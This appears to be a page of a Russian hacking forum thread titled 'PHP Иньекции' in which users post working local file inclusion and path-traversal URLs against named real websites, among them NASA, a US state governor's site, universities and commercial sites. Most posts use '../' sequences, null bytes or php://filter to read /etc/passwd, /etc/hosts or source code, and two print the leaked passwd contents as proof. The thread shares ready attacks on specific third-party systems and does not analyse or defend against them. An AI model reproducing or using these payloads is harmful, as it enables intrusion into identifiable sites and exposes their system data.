PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../etc/hosts

    http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

    http://www.royalcliff.com/m/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00
     
    _________________________
    #1261 <Cyber-punk>, 26 Aug 2011
    Last edited: 26 Aug 2011
    1 person likes this.
  2. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    http://realestatesky.net/index.php?option=com_propiedades&controller=../../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  3. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    66
    Reputations:
    34
    http://supernova.kiev.ua/index.php?page=../../../../etc/passwd
     
  4. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

    http://sergei-bronza.ru/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
     
    #1264 plaeer, 6 Sep 2011
    Last edited: 6 Sep 2011
  5. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    http://www.amarc.org/index.php?p=../../../../../etc/passwd

    ПР 7, ТИЦ 20
     
  6. stfox

    stfox New Member

    Joined:
    30 Aug 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    http://www.haefele-mietpark.de/?MAINPAGE=../../../../../etc/passwd
     
  7. Sidarovich1975

    Joined:
    4 Oct 2009
    Messages:
    60
    Likes Received:
    16
    Reputations:
    7
    http://www.olarkin.com/main/information/index.php?page=/../../../../../../../../etc/passwd
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    PHP инъекция на сайте NASA


    PHP:
    http://ceres.larc.nasa.gov/ceres_stm.php?date=../../../../../../../../../../etc/passwd%00
    Ответ:

    Code:
    at:x:25:25:Batch jobs 
    daemon:/var/spool/atjobs:/bin/bash 
    bin:x:1:1:bin:/bin:/bin/bash 
    daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP
     account:/srv/ftp:/bin/bash games:x:12:100:Games 
    account:/var/games:/bin/bash gdm:x:50:104:Gnome 
    Display Manager daemon:/var/lib/gdm:/bin/false 
    hacluster:x:90:90:heartbeat 
    processes:/var/lib/heartbeat/cores/hacluster:/bin/false 
    haldaemon:x:101:102:User for 
    haldaemon:/var/run/hal:/bin/false lp:x:4:7:Printing 
    daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer 
    daemon:/var/spool/clientmqueue:/bin/false 
    man:x:13:62:Manual pages 
    viewer:/var/cache/man:/bin/bash 
    messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false news:x:9:13:News 
    system:/etc/news:/bin/bash 
    nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash 
    ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false 
    postfix:x:51:51:Postfix 
    Daemon:/var/spool/postfix:/bin/false 
    root:x:0:0:root:/root:/bin/bash sshd:x:71:65:SSH 
    daemon:/var/lib/sshd:/bin/false suse-ncc:x:102:105:Novell 
    Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash uucp:x:10:14:Unix-to-Unix CoPy
     system:/etc/uucp:/bin/bash 
    www:x:80:3073::/var/lib/wwwrun:/bin/false 
    wwwrun:x:30:8:WWW daemon 
    apache:/var/lib/wwwrun:/bin/false 
    cmgather:x:55881:55881:CMGather:/etc/cm_info/data:/bin/sh 
    splunk:x:65535:65535:Splunk 
    Server:/opt/splunkforwarder:/bin/bash +:::::: 
    
     
    _________________________
    4 people like this.
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    http://www.continuum2.com/index.php?file=%2Fetc%2Fpasswd
     
  10. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    GameCaptain.de
    Code:
    http://pc.gamecaptain.de/index.php?file=robots.txt&week=31
    Code:
    http://storyevertelling.com/index.php?file=robots.txt
    
     
    #1270 Boolean, 30 Oct 2011
    Last edited: 30 Oct 2011
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.stmarytx.edu/print.php?s=php://filter/convert.base64-encode/resource=/usr/local/apache2/htdocs/technology/help/
     
    _________________________
    2 people like this.
  12. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://secchi.nrl.navy.[COLOR=Red][B]mil[/B][/COLOR]/index.php?p=index.php
     
  13. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Если не сбоянил, то
    http://www.hogwarts.ru/bestpupil.php?page=2&s=../../../../../../../../../../etc/passwd%00.png&uid=

    Ps.Плачь, поттероман :D
     
    3 people like this.
  14. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://mvdrk.karelia.ru/index.php?lawid=../index

    наша служба и опасна и трудна...
     
  15. Finki

    Finki Banned

    Joined:
    26 Feb 2011
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -5
    http://www.autoriparatori.org/index.php?pag=/etc/passwd
    http://www.funkuebung.com/index.php?page=/etc/passwd
    http://www.vanmaele.com/index.php?page=/etc/passwd
     
    #1275 Finki, 20 Nov 2011
    Last edited: 20 Nov 2011
  16. Spoos

    Spoos Banned

    Joined:
    17 Nov 2011
    Messages:
    24
    Likes Received:
    6
    Reputations:
    2
    http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00
     
  17. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    http://www.smsclothing.com/content.php?id=../../../../../../../etc/passwd%00
     
  18. xxddz

    xxddz Elder - Старейшина

    Joined:
    2 Oct 2009
    Messages:
    706
    Likes Received:
    365
    Reputations:
    162
    http://gumerov.ru/index.php?pg=../../../../../etc/passwd%00

    http://www2.mati.ru/english/index.php?path=../../../../../../etc/passwd%00
     
    #1278 xxddz, 28 Nov 2011
    Last edited: 28 Nov 2011
    1 person likes this.
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    Оффициальный сайт губернатора штата Луазианы США

    Inject
    Code:
    _ttp://www.gov.state.la.us/index.cfm?[COLOR=Magenta]md=../../../../../../etc/passwd%00[/COLOR]&tmp=detail&articleID=3122
    Answear
    Code:
    root:x:0:0:root:/root:/bin/bash 
    bin:x:1:1:bin:/bin:/sbin/nologin 
    daemon:x:2:2:daemon:/sbin:/sbin/nologin 
    adm:x:3:4:adm:/var/adm:/sbin/nologin 
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin 
    sync:x:5:0:sync:/sbin:/bin/sync 
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
    pcap:x:77:77::/var/arpwatch:/sbin/nologin 
    ntp:x:38:38::/etc/ntp:/sbin/nologin 
    dbus:x:81:81:System message bus:/:/sbin/nologin 
    etc....
     
    _________________________
    1 person likes this.
  20. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Акция: internet without shit!!!

    http://nottingham.ac.uk/common/files/download.php?path=/plzcnlab/oridb/cerevisiae/utilities/&file=ori_connect.php